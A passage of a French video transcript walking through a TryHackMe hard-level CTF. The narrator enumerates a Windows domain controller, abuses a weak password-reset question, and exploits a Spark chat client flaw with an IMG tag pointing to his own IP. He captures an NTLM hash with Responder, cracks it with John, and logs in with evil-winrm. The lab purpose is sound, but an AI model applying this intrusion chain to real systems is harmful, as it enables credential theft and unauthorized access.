Bonjour et bienvenue à tous sur cette nouvelle vidéo CTF sur la plateforme TryHackMe. Aujourd'hui on est sur un CTF de niveau difficile, je crois que c'est le premier qu'on fait sur la chaîne, si je dis pas de bêtises. Le CTF RA ou RA. Et honnêtement, j'ai déjà fait ce CTF, et honnêtement, je pense qu'il faut pas non plus se fier qu'à ça, hein, qu'est-ce qui est écrit là. C'est-à-dire qu'il y a des CTF qui sont aussi de difficulté hard et qui sont beaucoup plus compliqués que celui-là. Pourtant il y a la même difficulté ici, donc bon, voilà, faut pas se fier qu'à ça, mais je pense. Mais bon, bref. Désolé aussi si j'ai l'air peut-être un peu fatigué dans cette vidéo. Voilà, je vous préviens juste. Vous avez trouvé le réseau interne de WineCorp et leur contrôleur de domaine. Pouvez-vous pawn, je pense que ça veut dire pirater, pouvez-vous pirater leur réseau? Alors j'ai, comme d'habitude, démarré la machine déjà. On va lire l'énoncé, story. Vous avez gagné l'accès au réseau interne de WineCorp, l'entreprise multimilliardaire, qui a lancé une énorme campagne sur les médias sociaux en disant être impiratable. La prochaine étape serait de prendre les joyaux de la couronne et de gagner l'accès complet à leur réseau interne. Vous avez repéré une nouvelle machine Windows qui pourrait vous mener à votre but final. Pouvez-vous conquérir ce boss de fin et prendre le contrôle de leur réseau interne? Joyeux hacking. Bon, là on a des gens qui ont dû participer du coup pour la création de ce CTF. Et on a 3 flags à récupérer. Donc évidemment, comme c'est un CTF de niveau hard, en général c'est pas très guidé. Enfin, c'est pas guidé du tout même, hein. Vous avez juste des flags et puis bon voilà quoi. D'ailleurs c'est un CTF qui fait partie d'une série de CTF justement dans le thème de WineCorp. Je sais pas si ça a été inventé ou si ça existe vraiment, mais bref. Et du coup, bah ça c'est le premier de la série. Après il y a RA2, je crois. Non, je me demande s'il n'y en a pas un avant en fait. Bref, il fait partie d'une série de CTF, voilà. Qu'on fera en vidéo aussi. Hein. Le dernier CTF qui est de niveau insane, j'ai jamais réussi à le faire pour l'instant. Bref, du coup on va commencer. Je sais plus si je suis connecté au VPN. Non, je suis pas connecté au VPN. Je vais m'y connecter. Connect, mince. Donc je vais faire nmap 10.10.193.118. A. On fait toujours le même scan nmap. Hein. Donc je vais juste vous montrer une autre option qui est très pratique si vous voulez gagner du temps. Par exemple, comme je vous ai déjà dit dans une vidéo, si vous devez être plus rapide que d'autres joueurs dans un King of the Hill, c'est un petit plus. Voilà, vous faites "-d". Ce que ça fait "-d", c'est que ça active le mode debug. Et donc en fait, on aura toutes les informations qui s'afficheront à l'écran pendant le scan. Et on n'aura pas à attendre la fin du scan pour savoir quels ports sont ouverts. Regardez. Ah oui, elle reçoit pas les requêtes, enfin elle répond pas aux requêtes, elle répond pas au ping cette machine, donc il faut rajouter "-pn", c'est normal. C'est parce que c'est une machine Windows. Par défaut, les machines Windows ne répondent pas au ping. J'ai relancé le scan là parce que ça me paraît bizarre qu'il trouve rien. Il a l'air de pas réussir à se connecter à la machine. Peut-être qu'elle est pas encore entièrement démarrée, hein, c'est possible. Ouais, il y a eu un souci, j'ai dû relancer la machine virtuelle. Elle avait l'air buggée ou je sais pas. Donc je la relance, enfin je l'ai relancée là. Donc elle a changé d'adresse IP du coup évidemment. Du coup on va réessayer sans l'option "-pn" pour voir déjà. Ah, et vous voyez ça fonctionne. Et vous voyez la Discovered Open Port. Et déjà on voit port 445, 135, etc. On voit les différents ports, le port 80 est ouvert. Donc là déjà ce que je vois c'est le port 139 et 445. Ces deux ports là sont ouverts, ça veut dire que donc il y a le service SMB qui est exécuté sur la machine, qui est ouvert. Donc on va utiliser enum for Linux, l'adresse IP 10.10.221.39 et on va voir si on peut déjà énumérer sans nom d'utilisateur et sans mot de passe. On va voir si on peut énumérer des partages, voire des noms d'utilisateurs, hein, pourquoi pas. On a pas mal de ports ouverts. Il n'y a déjà pas l'air d'avoir le port pour EvilWinRM. Enfin, là, de base, c'est pas EvilWinRM, c'est WinRM, le service Windows Remote Management. Là, il est pas ouvert, donc on pourra pas utiliser EvilWinRM, je pense. Ici, le port 53, c'est le service DNS. Donc déjà, on peut énumérer les sous-domaines avec ça. Bon, là, on n'a rien trouvé parce qu'on n'a pas d'identifiant, je pense. Pour énumérer les sous-domaines, on peut interroger donc le service DNS, le serveur DNS. Donc bon, là cette machine, dans notre cas, fait office de serveur DNS puisqu'elle a le service installé dessus. Donc ouais, on pourrait utiliser dig comme ça, mais le truc c'est que j'ai pas le nom de domaine pour l'instant. Donc faudrait soit qu'on attende que le scan nmap se termine, soit qu'on aille voir par exemple sur le port 80 ou en tout cas un port où il y a potentiellement un serveur web. Donc c'est ce qu'on va faire avec notre navigateur. Donc là on va taper l'adresse IP 10.10.221.39. Voilà, on va voir ce qu'il y a sur le port 80 de cette machine. WineCorp. Déjà, ce qu'on peut faire, c'est faire clic droit, inspecter, ou F12. Vous pouvez appuyer sur F12, c'est plus rapide. Vous allez dans la console ici, et parfois vous avez des messages d'erreur qui vous disent que certaines ressources de telle URL n'ont pas pu être chargées, et vous voyez en fait le nom de domaine, voire le sous-domaine. Bon là, dans ces cas-là, il n'y a rien dans la console. Sinon, on peut regarder le code source. Hein. Vous voyez ici,
Quand il y a cette icône là, c'est qu'il y a une image qui n'a pas réussi à être chargée. Dans ces cas-là, on peut faire clic droit et inspecter dessus. On peut voir où est-ce que on est censé aller chercher cette image. Et là, on a le domaine plus un sous-domaine, donc fire.winecorp.thm. Et on voit même d'ailleurs qu'il y a une API, on dirait, qui sert à savoir si quelqu'un est présent ou pas. Et donc là, on a un nom de domaine et un sous-domaine. On va les ajouter d'abord. On va pas les ajouter d'abord. Et là, on sait qu'on a... donc comme on a un nom de domaine, winecorp.thm, on peut demander donc à cette adresse IP toutes les entrées concernant le domaine winecorp.thm. Donc voilà, on a plusieurs enregistrements DNS. Et ici, vous voyez, on a déjà deux sous-domaines, donc fire.winecorp.thm et hostmaster.winecorp.thm. Voilà. Donc on a deux sous-domaines plus le domaine. On va pouvoir les renseigner dans le fichier /etc/hosts qu'il faut éditer avec sudo. Hein. Voilà, donc 10.10.221.39. Et là du coup on va dire que le nom de domaine winecorp.thm correspond à donc l'adresse IP de la machine cible. Ensuite tab et ensuite on met fire.winecorp.thm et encore une fois on met hostmaster.winecorp.thm. Voilà, donc là on a le domaine et les deux sous-domaines qui sont enregistrés dans notre fichier host et comme ça notre machine saura que ces domaines et sous-domaines correspondent à cette adresse IP là. Donc je vais faire enregistrer, on quitte. Le scan and map est toujours pas terminé. Qu'est-ce qu'on a d'autre comme ports qui ont été intéressants à trouver? Ah si, 5985, ok, si il est là. Donc ça c'est un port qui correspond normalement au service Windows Remote Management. Et en fait si on arrive à avoir des identifiants, je crois même qu'on peut simplement avec un HNTLM, il me semble qu'on peut. On peut se connecter à distance et avoir un terminal PowerShell à distance sur ce port là en fait. Grâce à un outil qui s'appelle Evil WinRM. Après il y a d'autres ports, je sais pas trop à quoi ils correspondent honnêtement. Pas mal de ports ouverts. Bon du coup, ce qu'on va faire, vous voyez, je vais actualiser la page ici. Et vous voyez maintenant les images sont chargées. Ouais c'est bien ça, c'est pour voir si les utilisateurs sont présents ou pas, ok. On va essayer, on va lancer un scan GoBuster, dire -u http://winecorp.thm/ et ensuite la wordlist qu'on utilise, donc pardon w/usr share wordlist. On va utiliser la wordlist common.txt de seclist web discovery, non c'est discovery pardon, discovery web content et common.txt. On va enregistrer ça dans un fichier gobusterresults.txt. Hop, voilà, pendant que le scan GoBuster c'est assez rapide. Je vais attendre qu'il se termine et je vais en lancer un autre avec une autre wordlist comme ça, si jamais on a quelque chose d'intéressant. Pour l'instant, il n'y a rien de bien intéressant. /vendor. On va essayer d'aller voir maintenant ce qu'il y a dessus. Vendor. Bon, au moins ça c'est réglé. On n'y a pas accès. Forbidden. Access is denied. Ok. On va énumérer le site à la main. C'est-à-dire qu'on va voir avec notre navigateur ce qu'on peut trouver d'intéressant sur le site. Ça redirige vers où? Ok, nulle part. Je vais juste winecorp.thm, voilà, winecorp.thm c'est mieux. Du coup, déjà première chose que je vois ici, c'est qu'on a une fonctionnalité pour réinitialiser un mot de passe. Ça nous ouvre une fenêtre, et ici on peut taper donc un nom d'utilisateur. Là il y a une question secrète. Quel était le nom de votre professeur de première année? Quel est le nom de votre animal préféré? Bref, on a des questions secrètes ici, et on peut juste mettre la réponse ici, à la question secrète, et réinitialiser le mot de passe. Et le truc, c'est qu'on a juste besoin du nom d'utilisateur et de la question secrète. On pourrait soit essayer d'énumérer le site pour trouver des infos sur un employé ou autre. Dans un cas réel, on pourrait même faire de l'OSINT, je pense, pour trouver des infos sur un employé et essayer de voir si on peut pas reset son mot de passe avec une des questions ici. Sinon, on pourrait essayer le brute force. C'est-à-dire par exemple, on a un nom d'utilisateur, on va prendre une question, et on va essayer de la brute force, une autre, on va essayer de la brute force, on pourrait faire ça, mais on verra après. On va énumérer un peu plus le site avant. On a une barre de recherche ici, si je tape test, bon il se passe rien. Ouais non, ça m'a pas l'air... ça a l'air d'être cosmétique, on va dire, c'est pas vraiment fonctionnel, donc on s'en fiche. Alors, qu'est-ce qu'ils ont d'intéressant sur leur site? Nos systèmes sont toujours mis à jour. Ok, bon, on n'aura peut-être pas de grosses vulnérabilités type RCE du coup. Ne vous inquiétez pas, nous sommes derrière vous. Vos documents sont safe. Ils ont potentiellement des backups. Easy to use, facile à utiliser. Bon, ça on s'en fiche, c'est pas très utile pour nous. Là, on a des noms d'employés. Et en plus, on a regardé potentiellement, si je fais inspecter, on a potentiellement ici, si vous regardez là, Organic Fish 718. Si je regarde un autre en dessous, Organic Wolf 509. On a des noms d'utilisateurs ici, visiblement. Donc peut-être qu'on pourra s'en servir justement pour réinitialiser le mot de passe au-dessus. Peut-être. OpenFire. Je sais plus à quoi ça sert OpenFire. Mais il me semble qu'il y a des exploits qui existent pour OpenFire. Après, comme ils disent que justement c'est souvent ils mettent tout à jour, peut-être qu'on trouvera pas d'exploit pour la version qu'ils ont installée. Ça on s'en fiche. Notre département des ressources humaines, enfin notre service
RH, on s'en fiche, ok. Nos employés, et donc là on a 3 employés avec un petit mot qu'ils ont laissé. Ça c'est intéressant, elle est intéressante parce que ce qui est intéressant ici c'est qu'elle dit, elle aime pouvoir emmener son meilleur ami au travail avec elle. Et sur la photo, vous voyez, elle est avec un chien, donc potentiellement qu'elle emmène son chien au travail. Lily Levesque. Et en bas, on a quoi? On a contact. Ça mène à rien. En bas, on voit hashtag. On voit vers où ça redirige en fait. Ça redirige nulle part. Du coup, là, on a quoi? Je vais regarder sur le scan GoBuster. Je vais relancer un scan GoBuster avec une autre wordlist. Au cas où. C'est toujours ça de fait. Hein, comme ça, si jamais on peut trouver d'autres choses. GoBuster directory list 2.3 medium.txt. Bon, on va trouver des résultats similaires, mais on va voir si on trouve pas d'autres résultats peut-être qu'il y a dans cette wordlist et qu'il n'y avait pas dans l'autre. Le scan nmap est toujours pas terminé. C'est assez loin. Il y a pas mal de ports ouverts donc pour énumérer tous les... Ah, il a même pas fini d'énumérer les ports ouverts. Enfin bref, du coup, la seule chose vraiment très intéressante qu'on a ici pour l'instant sur le port 80, c'est la fonctionnalité de réinitialiser un mot de passe. On va aller voir s'il n'y a pas quelque chose sur le sous-domaine fire.winecore.thm. Non, il n'y a rien de... c'est le même site en fait. Bon, au moins ça on le sait, c'est le même site. Ce qu'on pourrait faire, c'est essayer de réinitialiser son mot de passe à elle. Parce qu'elle a probablement, faudrait qu'on trouve son nom d'utilisateur en fait, et le nom de son chien. Parce que si on fait reset password ici, rappelez-vous, on peut mettre juste le nom d'utilisateur, on peut mettre quel est votre animal, le nom de votre animal favori, et ici on peut rentrer du coup la réponse à la question. Donc il faudrait qu'on trouve son nom d'utilisateur et le nom de son chien. Si on inspecte la photo, ici on voit la source de l'image, et on voit que l'image s'appelle Lilil and Sparky. Je vous zoomerai sur la vidéo parce que j'ai remarqué que c'est très petit le code source ici. Donc si je zoome pas, vous risquez de pas voir. Donc ici, Lilil and Sparky. Du coup, on va essayer ça. On va faire reset password. Quel est le nom de votre animal favori? Donc là, c'était Lil. Et le nom du chien, c'était Sparky. Sparky, comme ça, il me semble. Reset. Ça n'a pas fonctionné. Alors c'est peut-être parce qu'il faut mettre une majuscule. Sparky, c'est écrit avec une majuscule dans le nom du fichier. Et ça a fonctionné. Votre password a été réinitialisé en change.me hashtag 1234. Donc on a un nom d'utilisateur et un mot de passe maintenant. Je vais les enregistrer quelque part. On va les copier. Ici je vais faire nanonote.txt. Attendez, je vais me déplacer dans le répertoire nanonote.txt et je vais mettre credentials de points. Prenez bien en note quand vous trouvez des trucs comme ça parce que le nombre de fois où j'ai trouvé des informations utiles et je les ai oubliées. Voilà, donc on a un nom d'utilisateur, un mot de passe. CTRL S, CTRL X. Le truc c'est que tout à l'heure je vous ai dit qu'il y avait le port, c'était quoi le port 5985, voilà. On va chercher sur internet si vous voulez. Port 5985. On va voir à quoi il correspond. Voilà, WinRM 2.0. Microsoft Windows Remote Management, c'est ça. Ok, ça c'est pour le protocole HTTP, ça pour le protocole HTTPS. Donc voilà, et si vous cherchez, bon ça c'est un truc que je sais plus comment je l'ai trouvé ça, mais maintenant je le connais. Evil WinRM, justement, Evil WinRM, on va aller sur la doc de Kali, c'est pas mal la doc de Kali, en général c'est simple et efficace. Voilà, et WinRM est l'ultime shell WinRM, donc Windows Remote Management, pour le pentesting. WinRM est une implémentation de Microsoft du protocole WS Management. Ce programme peut être utilisé sur n'importe quel serveur Microsoft Windows qui a cette fonctionnalité activée, souvent sur le port 5985. Bien sûr si vous avez la permission et les identifiants pour l'utiliser. Donc on va essayer de s'en servir de cet outil. Je vous mettrai les liens des docs dans la description comme d'habitude, les docs que j'utilise là dans la vidéo. Donc on va faire evil winrm -h parce que je me rappelle plus de la syntaxe, donc -h. -i l'adresse IP 10.10.221.39 où on aurait pu mettre le nom de domaine directement, ça aurait été plus rapide. -u lil et le mot de passe normalement il va nous le demander automatiquement. CTRL SHIFT V. Alors c'est pas dit que ça fonctionne, hein. C'est pas parce qu'on a des identifiants qui correspondent forcément à ça, c'est juste pour essayer. Là visiblement vu que ça met du temps, je pense que c'est pas bon. À part si la machine est extrêmement lente, hein. Mais bon je pense que si ça met autant de temps c'est que c'est pas bon, donc on va annuler. On pourrait essayer d'énumérer, parce qu'on a vu qu'il y avait il y avait le port 139, voilà, le port 139 et 445, les deux ports là ils sont ouverts. On a donc ces deux ports ouverts là, 139 et 445, qui correspondent au service SMB. Donc ce qu'on peut faire, maintenant qu'on a des identifiants, on peut simplement faire SMB client. Donc c'est le client SMB qui sert à se connecter à un serveur en utilisant le service SMB. Sur le service SMB, SMB client, -L majuscule pour lister les partages auxquels on a accès, donc l'adresse IP, -U majuscule pour préciser un nom d'utilisateur qui est Lilil. Et normalement, voilà, il nous demande le mot de passe, CTRL SHIFT V,
Et on a bien énuméré là, on voit qu'on a une liste de partages auxquels on a accès. Donc on a, bon, ces 3 partages là, on peut les laisser de côté, celui-là aussi, celui-là aussi. C'est-à-dire là directement, je pense que les 2 répertoires les plus intéressants à aller voir, ce serait Shared et Users. On va aller voir dans Shared d'abord ce qu'il y a, donc SMB client. Pour se connecter à un partage SMB, vous faites / l'adresse IP, / et le nom du partage, Shared, et on laisse tirer U Lilil. Hop, je colle le mot de passe, et on est bien connecté sur ce partage, ls- ah non, il n'y a pas à tirer là. LS juste. Et on a le premier flag. On va le récupérer. Je vais mettre des guillemets parce qu'il y a un espace dedans. .txt. On a récupéré le flag 1. Et là, on a .deb, .dmg, .exe. On a un programme qui est disponible sous différents formats. Bon, .exe, autant vous dire qu'on va pas s'en servir. On est sous Linux. On pourrait probablement avec Wine ou un truc comme ça, mais bon, on se compliquerait la vie pour rien. Là, on a l'archive carrément qui doit contenir peut-être les sources. Les codes sources peut-être de Spark, je sais pas. Et on a une version potentiellement aussi de Spark ici, Spark 2.8.3. Enfin une petite recherche pour voir ce qu'on peut trouver sur ce fameux Spark 2.8.3 probablement. On va voir si on peut pas trouver un exploit. Ah, tiens, on a un CVE ici. Un problème a été découvert dans init realtime Spark 2.8.3 et le plugin ROR qui va avec. Sous Windows, un message chat. On va cliquer. Donc un message chat qui inclut l'élément IMG avec un attribut SRC. Ouais, donc c'est une balise IMG classique en HTML du coup. Attribute referencing and external. Qui fait référence à une adresse IP externe. Lors de l'accès à cette hôte externe, le HNTLM de l'utilisateur est envoyé directement dans la requête HTTP, ce qui est assez quand même gros. Disallow an attacker to collect. Ce qui permet à un attaquant de collecter ces haches, les craquer et potentiellement compromettre l'ordinateur. D'accord. Ce site est pas mal hein, si vous connaissez pas. C'est un site qui est assez connu pour répertorier les CVE. C'est un site qui est pas mal avec ExploitDB. C'est 2 sites assez bien pour ça. Donc on peut trouver des infos assez utiles hein, sur des vulnérabilités. Ça aussi pareil, ce sera dans la description. D'ailleurs je vais me le mettre en favori. Voilà. Comme ça vous l'aurez en description. On va récupérer l'archive tar.gz là. Alors par contre ça va être long parce que ça a l'air assez lourd. Ça fait 123 mégaoctets si je dis pas de bêtises à peu près. Ça va prendre un petit peu de temps quand même. On a transféré donc le fichier. On va faire exit, ls. Ok, donc là on a 3 fichiers. D'ailleurs ils sont où mes fichiers de résultats de scan? Ils n'ont pas été créés encore j'imagine. Je vais déplacer le fichier GoBuster dans le bon répertoire. Là. Je vais créer un dossier SMB. On va trier nos fichiers vite fait. MV et on va déplacer tout ce qu'on a trouvé dans le répertoire SMB du coup. SMB. Je suis peut-être un peu plus lent que d'habitude hein, parce que je suis fatigué comme je vous ai dit. On va lire le flag. Ok, donc on a le flag 1. On va le copier. Je vais le renseigner sur TryAcme ici. Hop, CTRL V, voilà. Donc maintenant, on va extraire le fichier tar.gz. Donc je vais faire tar-xvf. Alors, ça c'est une combinaison de 3 options en fait. Hein. Je crois que c'est pareil que si on faisait ça, mais bon, ça sert à rien de faire comme ça. -xvf, donc X c'est pour extract, donc pour extraire une archive. V c'est pour activer le mode verbose, donc en gros pour afficher plus d'informations. Dans ces cas-là, enfin dans notre cas là, ça va afficher tous les fichiers qui ont été extraits dans la console. Et F, donc ça c'est juste pour préciser le fichier qu'on veut extraire, donc qui est Spark 2.8.3 tar.gz. On va l'extraire et le mode verbose du coup nous affiche tout ça là, tous les fichiers qui sont extraits. On va faire un petit clear. CD Spark. On a quoi là-dedans? On a 2 fichiers exécutables, Spark et Starter. On va essayer de lancer Spark du coup. Spark. Ça a pas l'air d'avoir lancé grand chose. PS, Ox. Non, bah, ça a rien lancé du coup visiblement on dirait. / starter. Hein, bizarre. Peut-être si on va dans bin. Il n'y a rien dans bin. Il n'y a rien dans bin. Ok, bon. Si on va dans ressources. Alors ressources, on a des fichiers DLL, sounds et on a un fichier startup.sh. On a un script. On a un script ici. On va le rendre exécutable et on va l'exécuter. Ah. Ça m'a l'air... Ok, ça nous a lancé Spark, qui a l'air... Oula, ça a l'air d'être... Je sais pas si c'est juste une vieille version ou si de base le logiciel est très vieux, mais... Ouais, ok. Et là, on peut mettre un nom d'utilisateur, un mot de passe, le domaine. Ok, on va essayer Lilil. Le mot de passe... non, pas... Non, ouais. Non, c'est le flag que j'ai collé. Faut que j'aille rechercher dans mes notes. Copier. On va coller le mot de passe dans Spark. Et le domaine, c'était windcorp.thm. Login, donc connexion. Impossible de vérifier le certificat. Si on va dans Avancé ici, on a 2 options qui sont en rapport avec les certificats. Donc on a désactiver la vérification du certificat, non recommandé, ou accepter tous les certificats, ceux qui sont self-signed, expirés ou pas de confiance. On va cocher ces 2 options, comme ça on est sûr qu'au moins, peu importe le certificat qu'on reçoit, voilà, il n'y aura pas de souci de certificat normalement. On va essayer de se connecter.
Bon, on a des erreurs, mais on est connecté ici, et du coup on sait qu'on peut récupérer le hash NTLM d'un utilisateur en lui faisant visiter notre, en faisant en sorte qu'il fasse une requête vers notre URL. On peut rechercher des utilisateurs en bas ici. Je vais juste chercher rien, ça trouve pas. On va chercher par exemple A, rechercher. On va prendre cette personne au pif, conversation. Et ici, on va du coup mettre une balise IMG src égale http notre adresse IP 10.14.32.60 2.8080 slash, et c'est tout normalement. On ferme la balise. Normalement ça doit être bon. Avant de faire entrer, je vais héberger. Alors je vais pas héberger un serveur web avec Python, je vais utiliser Responder. Qui est plus adapté pour ça. Responder, qui en fait n'est pas seulement un serveur HTTP, en fait ça regroupe plusieurs services. Responder.py, l'exécuter en tant que root, donc faire sudo. Ouais, il faut préciser l'interface, c'est ça, -i majuscule, et on va préciser l'interface. Donc dans mon cas, c'est l'interface Tune0 qui correspond au VPN de TryHackMe. Enfin, mon interface qui est connectée au VPN de TryHackMe. Je fais entrer, voilà, Listening for Events. Et donc là, on voit les différents services qui sont sur écoute. Donc on a un serveur LDAP, DNS, SMTP, POP3, IMAP, voilà. On a plein de serveurs qui sont ouverts en simultané. Comme ça, on peut recevoir différents types de requêtes. Du coup, normalement, dès qu'on recevra une connexion ou autre, on devrait avoir des informations affichées ici. Je vais envoyer ce truc. Du coup, j'ai fait une bêtise, excusez-moi, j'aurais pas dû mettre 2.8080, je vous dis, je suis fatigué. Hein. C'est sur le port 80 par défaut. J'ai l'habitude de mettre 80-80. On n'a pas l'air de recevoir quoi que ce soit pour l'instant. Après, normalement, là, il y a le point ici, il n'est pas allumé, donc ça veut dire qu'elle n'est pas connectée, la personne, je pense. Ça n'a pas l'air de fonctionner. Ce qu'on pourrait faire sinon, c'est aller... Parce que vous voyez, ici, c'est où? Là, en fait, on peut chercher par nom ou par email. Donc ce qu'on pourrait faire, c'est retourner sur le site ici. Et rappelez-vous, ici, on voit les gens qui sont présents ici. On a leur nom, qu'on va faire actualiser. Buzz, il est toujours présent. On va utiliser Buzz parce qu'il était présent avant. J'ai l'impression qu'il est tout le temps présent. Buzz, parce que les autres, ils n'arrêtent pas de changer, etc. On va utiliser Buzz et on voit du coup son nom, Buzz Candan. On va chercher Buzz Candan. Ah mince, j'ai fermé Spark. Bon, je vais le relancer du coup. Donc on va aller ici en bas, on va chercher Buzz Candan et on a un résultat, buzz@fire.wincore.thm. On va faire clic droit, conversation, et on va lui envoyer donc une balise IMG. On referme la balise, on lui envoie. C'est extrêmement rapide, on a reçu instantanément un hash NTLM ici, regardez, NTLM V2 client, donc on voit l'adresse IP d'où on a reçu le hash NTLM. Le nom d'utilisateur, donc on a le domaine, enfin la machine plutôt, anti-slash le nom d'utilisateur, et le hash NTLM ici, Buzz, WineCorp, etc. On va copier ce hash, on va essayer de le craquer avec John. Je vais faire nano hash, attendez pardon, je vais retourner dans le bon répertoire, voilà. Je vais faire nano hash.txt, on copie le hash NTLM dedans, on enregistre, on quitte, et ensuite on va utiliser John. Ouais, je suis obligé de mettre le chemin entier parce que bon, trop long à expliquer, mais bref. Donc on utilise John, le hash, donc le fichier qui contient le hash, hash.txt, et la wordlist qu'on veut utiliser égale /usr share wordlist rockview.txt, on va utiliser encore no such file or directory. Ah mince, je me suis trompé, j'ai oublié le S ici, wordlist. Et on a le mot de passe, qui correspond à l'utilisateur Buzz. On va le copier et on va déjà je vais le noter. Je vais le mettre dans mes notes. Voilà, j'ai copié les identifiants, CTRL X, pardon. Et on va essayer, du coup le scan and map c'est terminé depuis tout ce temps. Bon, je vais faire un clear, hein. Voilà, on regardera le scan and map en faisant 4, ce sera mieux. Voilà, 4. Du coup, qu'est-ce qu'on a d'intéressant? Bon, vous voyez, sinon on avait les sous-domaines ici qui étaient énumérés déjà. Mais il y a différentes manières d'énumérer les sous-domaines et des fois vous pouvez ne rien avoir dans... Enfin, Nmap peut ne pas trouver de sous-domaine et vous pouvez avec différents outils. Là, il les a trouvés dans le certificat SSL. C'est une méthode, vous pouvez le faire à la main aussi, c'est une méthode assez pratique pour trouver des sous-domaines sans devoir les brute force. Mais par contre, vous pouvez pas toujours trouver tous les sous-domaines avec cette méthode-là. Bon, ce qu'on va faire du coup avec ces identifiants, on va essayer d'utiliser xfreeRDP /v . Alors xfreeRDP, c'est pour se connecter en RDP, du coup Remote Desktop Protocol. C'est pour se connecter en bureau à distance sur une machine, voilà. Donc on va mettre /v . Donc là c'est pour préciser l'adresse IP cible, 10.10.221.39 /u pour préciser le nom d'utilisateur, donc c'est Buzz, /p pour le mot de passe. Je vais juste le mettre entre guillemets pour pas qu'il soit... Je sais pas si le plus peut être interprété comme quelque chose de particulier. On fait entrer, et là il nous demande si on fait confiance au certificat. Oui. Ah,
Pour vous connecter à distance, vous devez avoir le droit de vous identifier sur le service RDP. Du coup, on n'a pas le droit de se connecter en bureau à distance. Et on va essayer, comme je vous ai dit tout à l'heure, il y avait le port 5985, je crois, qui était ouvert, c'est ça? Donc on va utiliser evilwinrm-i windcore.thm, c'est plus rapide que l'adresse IP, -u buse, le mot de passe, CTRL-SHIFT-V, et on a un shell. Ok, on a un shell sur la machine en tant que buse. Windcore windcore.buse, voilà. Donc là c'est un shell PowerShell, donc c'est pas les mêmes commandes que sous Linux. Enfin il y en a qui sont identiques, mais il y en a qui sont pas du tout identiques. Voilà, à partir de maintenant on est en PowerShell. Si je fais ls, qui existe aussi en PowerShell, on n'a rien ici. cd ... On va aller sur son bureau, souvent dans les CTF sur Windows, souvent, moi en tout cas dans les CTF sur Windows que j'ai fait, le flag il est souvent soit dans Desktop, soit dans Documents, je l'ai jamais vu ailleurs je crois, ou dans le répertoire utilisateur. Du coup on a le flag 2 et on a des notes ici. Get, on va, pas get du coup, pardon je suis pas en... On va faire cat flag, ah ouais du coup on n'a pas de tab, pas de tab ne fonctionne pas. Cat flag 2.txt et on a le flag 2. Je vais le copier. On va le renseigner sur TryAcme. J'actualise juste pour voir si le compteur il est bien. Ouais c'est bon, il nous reste 1h10. Hop, je copie le hash ici. Excusez-moi, le flag. Et on va voir ce qu'il y a dans notes.txt. Puis il y a peut-être quelque chose d'intéressant maintenant. Parce que maintenant je pense qu'on va essayer d'élever nos privilèges. Notes.txt. I really should be better at talking. Je crois que le message il est pas fini. Je devrais vraiment être meilleur at taking. Ah non, c'est pas talking, c'est taking. Bref, on s'en fout. On va voir nos privilèges. Who am I /priv. Sous Windows, c'est comme ça, c'est who am I /priv. Pour énumérer nos privilèges. Et on a donc 3 privilèges, SE Machine Account Privilege. Il me semble pas qu'il y ait un privilège qui soit particulièrement utile pour l'élévation de privilèges ici. Je pense pas, on verra après, mais ça m'a pas l'air... On peut voir à quel groupe on appartient, who am I /groups. Alors on appartient au groupe users, everyone, bon tout le monde. Account operators. Account operators, on peut changer le... Avec ça on peut créer d'autres utilisateurs ou carrément changer le mot de passe d'utilisateur existant normalement. On cherchera après sur internet. Remote desktop users, pourtant on en fait partie de ce groupe. Remote management users. Alors là ici, il y a une doc de Microsoft, Account operators. Le groupe Account Operators, Grant Limited Account. Le groupe Account Operator a le droit a des droits limités de création d'utilisateurs privilégiés. Je sais pas si on peut créer un compte admin avec ça, mais on essaiera. Les membres de ce groupe peuvent créer et modifier la plupart des types de comptes, en incluant les comptes pour les utilisateurs, les groupes locaux, les groupes globaux. Les membres de ce groupe peuvent aussi se connecter localement au contrôleur de domaine, dans lequel on est déjà, du coup, normalement. En fait, la machine qu'on a attaquée, elle fait aussi office de contrôleur de domaine. Members of the Account Operator. Ah non, ok. Les membres du groupe Account Operator ne peuvent pas gérer les utilisateurs administrateurs. Alors, on peut modifier des mots de passe, mais pas des comptes administrateurs. Ça aurait été trop facile. On va aller voir dans la racine s'il n'y a pas quelque chose d'intéressant. Si vous regardez dans la racine ici, c2.anti/, on voit qu'il y a un dossier script. On va aller voir ce qu'il y a dans ce répertoire. C'est des scripts. ls. On a un script PowerShell, .ps1 c'est pour les scripts PowerShell, et un fichier log.txt. On va voir d'abord ce qu'il y a dans le fichier log.txt. Pardon, flag, oui j'ai l'habitude de faire 4 flag.txt, excusez-moi. Log.txt, last run, 26/2003 à 7h14. C'était il y a un moment. On va voir ce qu'il y a dans ce script. Peut-être que si on a des droits d'écriture dessus, on pourra faire quelque chose, je sais pas. .ps1. Alors en PowerShell, je suis beaucoup moins à l'aise. PowerShell, j'ai pas l'habitude d'en faire énormément. Donc on va essayer de voir ce que fait ce script. Ça, c'est les commentaires. Par contre, c'est comme en bash. Donc là, on a un commentaire avec hashtag reset the list of host prior to looping. Là, alors $, c'est pour créer une variable. $outage hosts égale $nul. C'est pour créer une variable. Spécifie who gets notified, notification to... Non, il y a cette personne-là qui est notifiée de quelque chose. J'imagine que comme le script s'appelle check server, ça doit être notifié de s'il y a un serveur qui est down ou pas. Read the file with the host every cycle. Alors visiblement, il y a un fichier qui est lu, qui contient des hôtes, et qui est lu en boucle. D'accord. Comme ça, on peut ajouter ou supprimer des hôtes de la liste sans toucher au script ou à la tâche programmée. J'ai perdu le mot français, excusez-moi, je suis fatigué. Donc visiblement, il y a le contenu de ce fichier qui est lu, where object, pour tous les objets qui commencent pas, qui contiennent pas d'hashtag ou qui commencent pas par un hashtag, je crois, dans la logique. Donc pour chaque objet, $p égale test connexion. Ok, alors en fait, dans $p, la variable, on met cette commande, et ensuite, avec invoke expression, en fait, on exécute la commande qu'il y a dans cette variable. Le truc, c'est que si on trouve un moyen d'écrire dans ce fichier, dans le fichier hot,
